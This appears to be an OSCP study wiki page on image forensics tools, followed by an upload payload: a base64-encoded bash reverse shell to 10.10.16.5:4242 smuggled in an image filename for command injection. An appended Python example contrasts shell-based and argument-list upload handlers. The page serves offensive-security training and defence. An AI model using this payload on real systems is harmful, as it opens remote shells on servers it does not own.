Image Mega - A1vinSmith/OSCP-PWK GitHub Wiki

Extract

Get metadata

exiftool *.jpg

Get hidden data

steghide extract -sf *.jpg

Identifying files and code embedded

binwalk -h

binwalk might need additional dependencies: http://www.infotinks.com/binwalk-tutorial/

Not intuitive, but it exists

strings

Payload

Upload an image to trigger command injection (the payload is carried in the filename)

echo -n "bash -c 'bash -i >& /dev/tcp/10.10.16.5/4242 0>&1'" | base64
touch 'shell.jpg; `echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQyNDIgMD4mMSc= | base64 -d | bash `;'
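
Why a filename shaped like the one above gets executed, and how an upload handler avoids it, as an added example that is not part of the original wiki page. The two handlers, the allowlist and the sample name are assumptions constructed here (the page does not show the target's code), and the sample carries a harmless echo in place of the encoded command.

```python
import re
import secrets
import subprocess

# Constructed sample: same shape as the filename above, but the backticks hold
# a harmless echo to stderr instead of the base64-decoded command.
SAMPLE = "shell.jpg; `echo INJECTED >&2`;"

# Allowlist (assumed policy): short basename, no shell metacharacters,
# image extension only.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.(jpg|jpeg|png)")


def shell_handler(name: str) -> subprocess.CompletedProcess:
    """Vulnerable pattern: the name is pasted into a shell command line."""
    return subprocess.run("printf '%s' " + name, shell=True,
                          capture_output=True, text=True)


def argv_handler(name: str) -> subprocess.CompletedProcess:
    """Hardened pattern: no shell; the name is one argv element, never parsed."""
    return subprocess.run(["printf", "%s", name],
                          capture_output=True, text=True)


def stored_name(name: str) -> str:
    """Reject names outside the allowlist and store under a random name."""
    match = SAFE_NAME.fullmatch(name)
    if match is None:
        raise ValueError(f"rejected upload name: {name!r}")
    return f"{secrets.token_hex(16)}.{match.group(1)}"


if __name__ == "__main__":
    # The shell splits on ';' and evaluates the backticks.
    print("shell :", shell_handler(SAMPLE).stderr.strip())
    # Without a shell the whole string stays a literal argument.
    print("argv  :", argv_handler(SAMPLE).stdout)
    try:
        stored_name(SAMPLE)
    except ValueError as exc:
        print("upload:", exc)
```

For detection, an uploaded name that fails the allowlist is worth logging with the source address, since legitimate clients rarely send `;` or backticks in a filename.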